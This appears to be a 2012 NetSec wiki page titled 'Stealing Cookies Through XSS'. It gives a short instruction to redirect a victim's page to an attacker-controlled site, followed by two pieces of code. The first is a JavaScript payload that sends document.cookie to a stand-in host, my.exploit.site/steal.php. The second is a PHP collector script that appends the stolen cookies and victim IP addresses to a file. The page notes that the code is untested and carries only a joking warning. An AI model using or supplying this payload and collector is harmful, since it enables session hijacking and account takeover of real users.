Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Cookies/Attacks/Stealing Cookies Through XSS"
From NetSec
Chantal21I (Talk | contribs) (Created page with "{{quote|Remember that stealing cookies will make your friends or the grocery shop owner angry!|Savitri}} Change the current page to another location you control, using the docum...") |
(No difference)
|
Latest revision as of 06:42, 19 July 2012
Savitri says |
---|
Remember that stealing cookies will make your friends or the grocery shop owner angry! |
Change the current page to another location you control, using the document.cookie as parameter. Ideally make it as smooth as possible. Best option is to contaminate an iframe, and to recurse the iframe to its original contents.
<syntaxhighlight lang="javascript"> location.href = "http://my.exploit.site/steal.php?originalURL="+encodeURIComponent(location.href)+"&cookies="+encodeURIComponent(document.cookie); </syntaxhighlight> |
steal.php should be something like
<syntaxhighlight lang="php"> <?php /* (c) 2011 BlackHatAcademy */ $data = urldecode($_GET['cookies']); file_put_contents("stolen_cookies.txt", "<IP>".$_SERVER['REMOTE_ADDR']."</IP><![CDATA[".$data."]]>", FILE_APPEND); echo ' '; die(); ?> </syntaxhighlight> |
Savitri says |
---|
This is untested. Feel free to provide a sample implementation or anything more refined. |